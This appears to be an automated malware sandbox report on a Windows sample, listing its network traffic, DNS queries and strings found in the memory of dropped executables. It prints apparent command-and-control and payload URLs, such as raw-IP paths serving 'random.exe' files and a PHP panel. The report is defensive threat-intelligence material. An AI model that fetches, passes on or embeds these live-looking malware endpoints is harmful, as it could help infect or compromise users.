Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Q3VQNTWM9P39NQXSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1304Host: sweepyribs.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4QP2GXHW7PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 29546Host: sweepyribs.lat
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: sweepyribs.lat
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009DE0C0 recv,recv,recv,recv,

0_2_009DE0C0

Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /files/kosodium/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/flava/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /vJNDHPUXPCEIZZjTPbLp1734325090?argument=EEOgMEn0tHAhOkMu1734411834 HTTP/1.1Host: home.fivetk5pn.topAccept: /
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16

Source: e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: diffuculttan.xyz
Source: global traffic	DNS traffic detected: DNS query: immureprech.biz
Source: global traffic	DNS traffic detected: DNS query: deafeninggeh.biz
Source: global traffic	DNS traffic detected: DNS query: effecterectz.xyz
Source: global traffic	DNS traffic detected: DNS query: debonairnukk.xyz
Source: global traffic	DNS traffic detected: DNS query: wrathful-jammy.cyou
Source: global traffic	DNS traffic detected: DNS query: awake-weaves.cyou
Source: global traffic	DNS traffic detected: DNS query: sordid-snaked.cyou
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: home.fivetk5pn.top
Source: global traffic	DNS traffic detected: DNS query: sweepyribs.lat
Source: global traffic	DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic	DNS traffic detected: DNS query: youtube.com
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic	DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: example.org
Source: global traffic	DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic	DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: fivetk5pn.top
Source: global traffic	DNS traffic detected: DNS query: www.youtube.com
Source: global traffic	DNS traffic detected: DNS query: www.facebook.com
Source: global traffic	DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic	DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic	DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic	DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic	DNS traffic detected: DNS query: www.reddit.com
Source: global traffic	DNS traffic detected: DNS query: twitter.com
Source: global traffic	DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: reddit.map.fastly.net
Source: global traffic	DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: services.addons.mozilla.org
Source: global traffic	DNS traffic detected: DNS query: normandy.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: normandy-cdn.services.mozilla.com

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: immureprech.biz

Source: 53fe16f582.exe, 00000024.00000003.3131028686.00000000071C5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.css
Source: 53fe16f582.exe, 00000024.00000003.3131028686.00000000071C5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.jpg
Source: e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: 53f7160658.exe, 00000023.00000002.3474117746.0000000000692000.00000040.00000001.01000000.0000000F.sdmp, 53f7160658.exe, 00000023.00000003.3017322242.0000000004A20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://185.208.159.109/panel/page.php
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/fac00b58987e8e4f4b2846d934f48b15eaa495c49001J
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe;
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000005.00000002.3479841475.0000000001158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe$
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe0
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe1
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe16496001
Source: skotes.exe, 00000005.00000002.3479841475.0000000001158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe3f0b27a17c.exe
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe43/OmAo
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe4c61395d7jm
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exeP
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exeT
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exeV
Source: skotes.exe, 00000005.00000002.3479841475.0000000001158000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exeY
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exeb15e
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exec61395d7f
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exec6139FmFoE
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exeu
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/ons
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000005.00000002.3479841475.000000000116E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: skotes.exe, 00000005.00000002.3479841475.000000000116E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeencoded
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/well/random.exe
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/well/random.exe61coded
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/well/random.exeP
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/well/random.exeW
Source: skotes.exe, 00000005.00000002.3479841475.00000000011F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000005.00000002.3479841475.00000000011F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php0j
Source: skotes.exe, 00000005.00000002.3479841475.00000000011F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpB
Source: skotes.exe, 00000005.00000002.3479841475.00000000011F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpS=
Source: skotes.exe, 00000005.00000002.3479841475.00000000011F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpmRo
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/burpin1/random.exe
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/flava/random.exe6
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/flava/random.exeR
Source: skotes.exe, 00000005.00000002.3479841475.000000000116E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/kosodium/random.exed0Zo
Source: skotes.exe, 00000005.00000002.3479841475.000000000116E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/kosodium/random.exew0Mo
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/martin/random.exe
Source: skotes.exe, 00000005.00000002.3479841475.000000000119F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://31.41.244.11/files/martin/random.exez
Source: a98b6b83c7.exe, 00000025.00000003.3324565962.0000000005828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: a98b6b83c7.exe, 00000025.00000003.3324565962.0000000005828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: a98b6b83c7.exe, 00000025.00000003.3324565962.0000000005828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: skotes.exe, 00000005.00000002.3479841475.00000000011C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: skotes.exe, 00000005.00000002.3479841475.00000000011C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: a98b6b83c7.exe, 00000025.00000003.3324565962.0000000005828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: a98b6b83c7.exe, 00000025.00000003.3324565962.0000000005828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: a98b6b83c7.exe, 00000025.00000003.3324565962.0000000005828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: a98b6b83c7.exe, 00000025.00000003.3324565962.0000000005828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: skotes.exe, 00000005.00000002.3479841475.00000000011C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: skotes.exe, 00000005.00000002.3479841475.00000000011C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: 53fe16f582.exe, 00000024.00000003.3131028686.00000000071C5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://home.fivetk5pn.top/vJNDHPUXPCEIZZjTPbLp17
Source: 53fe16f582.exe, 00000024.00000003.3131028686.00000000071C5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: a98b6b83c7.exe, 00000025.00000003.3324565962.0000000005828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: a98b6b83c7.exe, 00000025.00000003.3324565962.0000000005828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: skotes.exe, 00000005.00000002.3479841475.00000000011C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: e66237da20.exe, 00000006.00000002.2942461187.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922133401.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: e66237da20.exe, 00000006.00000002.2942461187.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922133401.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: e66237da20.exe, 00000006.00000002.2942461187.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922133401.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: b3712f1a7c.exe, 00000007.00000003.2918116828.0000000002591000.00000004.00000020.00020000.00000000.sdmp, b3712f1a7c.exe, 00000007.00000000.2915045902.0000000000423000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: a98b6b83c7.exe, 00000025.00000003.3324565962.0000000005828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: a98b6b83c7.exe, 00000025.00000003.3324565962.0000000005828000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: a98b6b83c7.exe, 00000025.00000003.3269273510.00000000057AB000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3269471087.00000000057A8000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3270029768.00000000057A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922133401.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: e66237da20.exe, 00000006.00000002.2942229584.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://awake-weaves.cyou/api
Source: e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: a98b6b83c7.exe, 00000025.00000003.3269273510.00000000057AB000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3269471087.00000000057A8000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3270029768.00000000057A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: a98b6b83c7.exe, 00000025.00000003.3269273510.00000000057AB000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3269471087.00000000057A8000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3270029768.00000000057A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: a98b6b83c7.exe, 00000025.00000003.3269273510.00000000057AB000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3269471087.00000000057A8000.00000004.00000800.00020000.00000000.sdmp, a98b6b83c7.exe, 00000025.00000003.3270029768.00000000057A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: e66237da20.exe, 00000006.00000003.2922448187.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922133401.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: e66237da20.exe, 00000006.00000003.2922007303.0000000000CFF000.00000004.00000020.00020000.00000000.sdmp, e66237da20.exe, 00000006.00000003.2922007303.0000000000D05000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
